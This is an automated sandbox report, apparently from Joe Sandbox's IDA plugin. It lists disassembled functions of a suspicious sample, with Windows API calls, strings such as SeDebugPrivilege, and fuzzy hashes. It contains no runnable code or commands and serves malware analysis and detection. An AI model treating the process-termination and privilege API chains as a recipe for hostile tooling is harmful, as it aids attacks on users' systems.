GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E0C
HeapAlloc.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF8A84,00000B00,?,?), ref: 00AF8E28
GetCurrentProcess.KERNEL32(?,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E30
DuplicateHandle.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF8A84,00000B00,?,?), ref: 00AF8E43
GetCurrentProcess.KERNEL32(00AF8A84,00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E4B
DuplicateHandle.KERNEL32(00000000,?,00AF8A84,00000B00,?,?), ref: 00AF8E4E
CreateThread.KERNEL32(00000000,00000000,00AF8E74,00000000,00000000,00000000), ref: 00AF8E68

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2680f989e7d6f98bc4c9dc01b40132a3a6d599560fb79bbeb81f62a761362eaf
Instruction ID: f372b5402eb7c7aafa9f0b8d2159586adbde2aab563f2b4b68f99cab4553b51d
Opcode Fuzzy Hash: 2680f989e7d6f98bc4c9dc01b40132a3a6d599560fb79bbeb81f62a761362eaf
Instruction Fuzzy Hash: 4101BBB5640309FFEB20ABA5DD4EF6B3BACEB89711F404421FA05DB1A1CA749811CB20

Function 00B19428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1947C
VariantInit.OLEAUT32(?), ref: 00B1954D
VariantInit.OLEAUT32(?), ref: 00B1964E
VariantClear.OLEAUT32(?), ref: 00B19658
VariantClear.OLEAUT32(?), ref: 00B196B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00B19631
Null Object assignment in FOR..IN loop, xrefs: 00B194DD, 00B1960B, 00B196C3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: ce927bd28bc8b49c228594b97b6d65199bce088db28287e162888f6f9bb8d603
Instruction ID: 2685707e89ab42b9623e8e9ba8ff86fb040b702a2c65dcf27706cc6ec222b76c
Opcode Fuzzy Hash: ce927bd28bc8b49c228594b97b6d65199bce088db28287e162888f6f9bb8d603
Instruction Fuzzy Hash: 3591CE71A00249ABDF24DFA5C894FEEBBF8EF45710F108199F515AB290D7709A85CFA0

Function 00B19A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00AF7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?,?,00AF799D), ref: 00AF766F
Part of subcall function 00AF7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF768A
Part of subcall function 00AF7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF7698
Part of subcall function 00AF7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?), ref: 00AF76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B19B1B
_memset.LIBCMT ref: 00B19B28
_memset.LIBCMT ref: 00B19C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B19C97
CoTaskMemFree.OLE32(?), ref: 00B19CA2

Strings

NULL Pointer assignment, xrefs: 00B19CF0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: c2faf81bf125e898768a64686e14f4ca9fe256aea4056921d519f5c90ce10d58
Instruction ID: 22db9982f49973b5f5caafe8354f2b444fe179e8f98c93c3f83216b740e2391d
Opcode Fuzzy Hash: c2faf81bf125e898768a64686e14f4ca9fe256aea4056921d519f5c90ce10d58
Instruction Fuzzy Hash: 53913871D00219EBDF10DFA4DD94ADEBBB8EF09710F20816AF519A7281DB319A45CFA0

Function 00B26FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B27093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B270A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B270C1
_wcscat.LIBCMT ref: 00B2711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B27133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B27161

Strings

SysListView32, xrefs: 00B27065

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: de1d9095a6fe63667933311097c63bd9ac970dc64548ad70b3f0d5730cdaf27f
Instruction ID: 055bf8774f54787a74de091f7934f3c117b54adc6577027e82d29071105f96a2
Opcode Fuzzy Hash: de1d9095a6fe63667933311097c63bd9ac970dc64548ad70b3f0d5730cdaf27f
Instruction Fuzzy Hash: 9441C370944319AFEB219F64DC85FEF77F8EF08350F1009AAF948A7291DA719D888B54

Function 00B1EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B03E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B03EB6
Part of subcall function 00B03E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B03EC4
Part of subcall function 00B03E91: CloseHandle.KERNEL32(00000000), ref: 00B03F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1ECB8
GetLastError.KERNEL32 ref: 00B1ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1ED77
GetLastError.KERNEL32(00000000), ref: 00B1ED82
CloseHandle.KERNEL32(00000000), ref: 00B1EDB7

Strings

SeDebugPrivilege, xrefs: 00B1ECD6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 12761f91355120e32f6c53f01643ae0c3495bd00a46e195c8ccbb11d0126dcf2
Instruction ID: b8d54d53ad8210a09d49fdef28797c1d740e0b453aa8e6639c7cd9e70eedcbd0
Opcode Fuzzy Hash: 12761f91355120e32f6c53f01643ae0c3495bd00a46e195c8ccbb11d0126dcf2
Instruction Fuzzy Hash: 2E41BB712002019FDB20EF24CD95FBEB7E5AF81714F0880A9F9429B2D2DB75E845CB96

Function 00B03226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B032C5

Strings

stop, xrefs: 00B03296
question, xrefs: 00B0327E
blank, xrefs: 00B03247
warning, xrefs: 00B032AE
info, xrefs: 00B03266

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: fe7ec3369ec57f2bfef36de9528448cb89eceb4d972575c392914e4ed7716131
Instruction ID: ddb853ccd15ef94acbd883ec66043301830f7b564065b1c54c2a530cc6066c01
Opcode Fuzzy Hash: fe7ec3369ec57f2bfef36de9528448cb89eceb4d972575c392914e4ed7716131
Instruction Fuzzy Hash: 18113A36208346BFEB015B55DC97E6ABBDCDF19B70F2000EAF901B61C1EAB25F4045A5

Function 00B04534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0454E
LoadStringW.USER32(00000000), ref: 00B04555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0456B
LoadStringW.USER32(00000000), ref: 00B04572
_wprintf.LIBCMT ref: 00B04598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B045B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B04593

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: ff2870aa23841a4636cc8083ffe4c11253ed7ddbd3dab1eacdb38400e9a8340f
Instruction ID: e5766c9fca4651bfecb404f4ca70906cd233e55bb6d27dd95916a0f7ede6287e
Opcode Fuzzy Hash: ff2870aa23841a4636cc8083ffe4c11253ed7ddbd3dab1eacdb38400e9a8340f
Instruction Fuzzy Hash: 4E012CF2900209BBE721A7A0DD89EF676BCE708701F4005F5BB49E2051EA749E858B70

Function 00B2D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetSystemMetrics.USER32(0000000F), ref: 00B2D78A
GetSystemMetrics.USER32(0000000F), ref: 00B2D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2DA24
ShowWindow.USER32(00000003,00000000), ref: 00B2DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00B2DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2DA8B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 3aabeee6aaca3378ca24c87a9b679f1ff5d70883cf1ba217c02cc6a92c345aa0
Instruction ID: d8400b0d5b77e8fe49f9aaf3c33caf28c78ec18bec1ca9f519277fa67c75a2a9
Opcode Fuzzy Hash: 3aabeee6aaca3378ca24c87a9b679f1ff5d70883cf1ba217c02cc6a92c345aa0
Instruction Fuzzy Hash: EFB16871600226ABDF14CF68D9C5BBD7BF1FF45701F0881A9ED489B295DB34A990CB90

Function 00AA2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00AA2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00ADC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC417,00000004,00000000,00000000,00000000), ref: 00ADC4D6

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 949762e1a0f7eb38cc7835204c5faa64ceb109f83a2e0e91f5594a08406f6ec7
Instruction ID: 68a065e2d03e2b3edf3e796d7b97ba568e344cbf4801ac65b046b7dfe5a077ca
Opcode Fuzzy Hash: 949762e1a0f7eb38cc7835204c5faa64ceb109f83a2e0e91f5594a08406f6ec7
Instruction Fuzzy Hash: 2B41E7712086819BD7358B2C9D9CB7B7BB2AF87350F58882EE047876E1CB75A852D710

Function 00B07368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B0737F

Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B073B6
EnterCriticalSection.KERNEL32(?), ref: 00B073D2
_memmove.LIBCMT ref: 00B07420
_memmove.LIBCMT ref: 00B0743D
LeaveCriticalSection.KERNEL32(?), ref: 00B0744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B07461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07480

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: f742923956f0272ed55bf2206eaabc399343c86616cf4bd85517cd7639681773
Instruction ID: f687e603d7b23ebc5ab4175fce36a19a243c57d7ed7d1cddc129dbdf418d9f67
Opcode Fuzzy Hash: f742923956f0272ed55bf2206eaabc399343c86616cf4bd85517cd7639681773
Instruction Fuzzy Hash: B0319E31A04205EBDF10DF64DD85EAEBBB8EF45710B1540B9F904AB286DB309A51CBA0

Function 00B26442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B2645A
GetDC.USER32(00000000), ref: 00B26462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B2646D
ReleaseDC.USER32(00000000,00000000), ref: 00B26479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B264B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B264C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B29299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B26500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B26520

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 45ad7f6a2f650e8a29a5232f097b1b649584c610bcab394b5f90b118faa01c95
Instruction ID: e1ba4cdec1a67d0b010a51b711c55c99e58f7f36c322b9c4398636efa8470c6b
Opcode Fuzzy Hash: 45ad7f6a2f650e8a29a5232f097b1b649584c610bcab394b5f90b118faa01c95
Instruction Fuzzy Hash: 83314D72201214BFEB218F50DC4AFFB3FA9EF19765F044065FE089A295DA759C42CB64

Function 00AFC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFC087
_memcmp.LIBCMT ref: 00AFC0A9
_memcmp.LIBCMT ref: 00AFC0C1
_memcmp.LIBCMT ref: 00AFC0D4
_memcmp.LIBCMT ref: 00AFC0EE
_memcmp.LIBCMT ref: 00AFC101
_memcmp.LIBCMT ref: 00AFC119
_memcmp.LIBCMT ref: 00AFC134

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 58c2d1dd9d07cc02a250b05a15827ac13013d8f73abb7051bd7e7eb4d84a496c
Instruction ID: 8088a9aaeecc3e297251de461cd7863d84e3189efb45cdffd3b82c1b9a561e10
Opcode Fuzzy Hash: 58c2d1dd9d07cc02a250b05a15827ac13013d8f73abb7051bd7e7eb4d84a496c
Instruction Fuzzy Hash: 9121927170020DBBD614A7629F52FBB33ACAF113B4F144024FF0596693EB55DE2382A5

Function 00B0ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9

_wcstok.LIBCMT ref: 00B0EEFF
_wcscpy.LIBCMT ref: 00B0EF8E
_memset.LIBCMT ref: 00B0EFC1

Strings

X, xrefs: 00B0EFFE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 94c07115bbdf33f2063475c3ab45f4818b13ac1b3b363bb913c70b7f7ea89373
Instruction ID: 9b9657ce30de072ef0dc5431fb9b49d5ec6bd9a6eb4890cc5e1ebb256be6554e
Opcode Fuzzy Hash: 94c07115bbdf33f2063475c3ab45f4818b13ac1b3b363bb913c70b7f7ea89373
Instruction Fuzzy Hash: 03C14D716087019FC724EF24C985A6BBBE4EF85350F0449ADF899972E2DB30ED45CB92

Function 00AA1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
